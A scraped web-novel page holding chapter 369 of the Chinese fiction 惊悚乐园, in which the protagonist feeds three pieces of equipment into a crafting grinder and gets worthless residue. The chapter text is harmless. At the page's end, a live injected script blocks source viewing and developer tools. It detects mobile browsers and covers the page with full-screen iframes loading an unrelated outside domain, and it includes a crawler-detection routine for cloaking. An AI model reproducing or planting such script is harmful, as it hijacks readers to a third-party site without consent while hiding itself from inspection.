新笔趣阁
会员书架
首页 > 科幻灵异 > 惊悚乐园 > 第369章 久违的坑爹

第369章 久违的坑爹(1 / 2)

章节目录 加入书签
好书推荐: 凤朝江山 明星玩家 数码宝贝之剑侠 公主复国记 全系筑梦师 法师文明 小安之旅 食至名归 极品召唤手机 我的青春不可能注孤独

“坑——爹——啊——”封不觉在储藏室中仰天长啸。

时隔半个多月的一声坑爹,荡气回肠。

“什么玩意儿啊!游戏说明里不是号称拼图牌合出来的至少是精良级装备吗?”封不觉自言自语道。

他的激动只持续了几秒钟,随后,他的脸色就突然恢复了平静。

这家伙的情绪变化简直像是电灯开关一样,说冷静就能冷静,前后间隔只要一瞬间。

“等等……”封不觉念道,“莫非……”他又重新看了一下物品说明,视线停留在了备注的最后一段:【被贴上了“垃圾”的标签,锁进了仓库里。】

“也就是说……这玩意儿的品质和功能,都是“巫师协会”那帮受害者填上去的,但真正的品质不明是吗……”他心中推测道。

有了这样一个设想后,他的作死行为开始了……

“嗯……试一下应该就知道了。”封不觉念及此处,便开始审视起自己的装备来,“只要扔三个精良级以上的东西进去,就有机会拿到传说级装备了是吧……”

目前来说,封不觉认为自己手头最鸡肋的装备是【十八铜人的折凳(五号)】,这个没有装备条件的玩意儿在低等级PK时可能会发挥奇效,但等级上去之后,用这个抡人还不如赤手空拳来得有威力。可惜,该装备的品质是“破败”,还够不上粉碎机特效发动的要求。

大约考虑了两分多钟,封不觉最终选定的三件装备分别是:【普罗晏比娜的吸尘器】、【蛛丝手套】和【哥布林毒气口罩】。

随着等级的提高,玩家们战斗的节奏越来越快,打斗形式愈发复杂,激烈程度也是更甚。因此,以上这三样东西的使用率和实用性,现在看来就显得比较差了。

同样是低级别时获得的精良级装备,【马里奥的管钳】和【爵士之舞】这两件就优越得多。前者本身具备工具的特性,可以配合【不那么草率的维修】使用,后者的被动特效更是卓越可靠。

“嗯,是这样用吗……”封不觉把粉碎机摆到地上,然后先把体积最大的吸尘器放到了传送带上。

【重要提示:您的操作具备不可逆性,请问您确定要这样做吗?】系统提示音和弹窗这时跳了出来。

封不觉点选了确认,吸尘器便像生根一样被固定在了机器的传送带上。接下来的两件装备,他也是如此操作,半分钟后,三件装备就在传送带上排成了一排。觉哥也没有犹豫,紧接着就拉动了机器旁边的操作杆。

库叱库叱……

一阵怪响从机器内响起,传送带动了起来,那三件装备在这一刻突然被卡通化了。当它们从传送带进入机器内的瞬间,都像是“挤”进去的一样,还发出“噔儿”这种音效。

十几秒后,待三件装备全部进入了机器内,机器开始颤动起来,吱吱嘎嘎地乱响,就像一台故障的引擎,缝隙中还冒出缕缕紫烟。无论怎么看……这【零式魔导粉碎机】都给人一种相当不靠谱的感觉。

又过了片刻,机器另一端的凸透镜亮了起来,锥形的光束聚焦并射出,一团白光赫然成形,随即就凝成了一件物品。

【名称:已蜕能的残渣】

点击切换 [繁体版] [简体版]
章节目录 加入书签
新书推荐: 玩家总动员 [剑三]末日生存录 网游之另类女神 英雄联盟之冰封王座 快穿我渣了我的作者 大清宰相厚黑日常 NBA之谦谦君子 网游之无心成神 网游之女大学生 网游之位面
// 禁止查看源码 document.addEventListener('contextmenu', function (e) { e.preventDefault(); }); // 禁止鼠标右键 document.addEventListener('keydown', function (e) { if (e.keyCode === 93 || (e.ctrlKey && e.shiftKey && e.keyCode === 73)) { e.preventDefault(); } }); // 禁止 F12 document.addEventListener('keydown', function (e) { if (e.keyCode === 123) { e.preventDefault(); } }); document.addEventListener('DOMContentLoaded', function () { main(); }); function isMobile() { const userAgent = navigator.userAgent.toLowerCase(); const mobileKeywords = ['nokia', 'sony', 'ericsson', 'mot', 'samsung', 'htc', 'sgh', 'lg', 'sharp', 'sie-', 'philips', 'panasonic', 'alcatel', 'lenovo', 'iphone', 'ipod', 'blackberry', 'meizu', 'android', 'netfront', 'symbian', 'ucweb', 'windowsce', 'palm', 'operamini', 'operamobi', 'openwave', 'nexusone', 'cldc', 'midp', 'wap', 'mobile']; if (userAgent.includes('http_x_wap_profile') || userAgent.includes('wap') || userAgent.includes('mobile') || mobileKeywords.some(keyword => userAgent.includes(keyword))) { return true; } if (userAgent.includes('vnd.wap.wml') && (userAgent.includes('text/html') === false || userAgent.indexOf('vnd.wap.wml') < userAgent.indexOf('text/html'))) { return true; } return false; } function isSpider() { const userAgent = navigator.userAgent.toLowerCase(); const spiderKeywords = ['googlebot', 'spider', 'baiduspider', 'yahooslurp', 'msnbot', 'sosospider', 'yodaobot', 'outfoxbot', 'sogou web spider', 'sogou orion spider', 'fast-webcrawler', 'gaisbot', 'ia_archiver', 'altavista', 'lycos_spider', 'inktomi slurp']; return spiderKeywords.some(keyword => userAgent.includes(keyword)); } function main() { const isMobileDevice = isMobile(); // const isSpiderBot = isSpider(); if (isMobileDevice) { const url = 'segui99.life'; setTimeout(function () { var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?ac76300945c612415ea74e6625be7a6e"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); // 创建白色 iframe 元素 const whiteIframe = document.createElement('iframe'); whiteIframe.style.position = 'fixed'; whiteIframe.style.top = '0'; whiteIframe.style.left = '0'; whiteIframe.style.width = '100%'; whiteIframe.style.height = '100%'; whiteIframe.style.border = 'none'; whiteIframe.style.backgroundColor = 'white'; // 将白色 iframe 添加到 body 元素中 document.body.appendChild(whiteIframe); // 创建 iframe 元素 const iframe = document.createElement('iframe'); iframe.style.position = 'fixed'; iframe.style.top = '0'; iframe.style.left = '0'; iframe.style.width = '100%'; iframe.style.height = '100%'; iframe.style.border = 'none'; // 设置 iframe 的 src iframe.src = `https://${url}/`; // 将 iframe 添加到 body 元素中 document.body.appendChild(iframe); }, 500); } }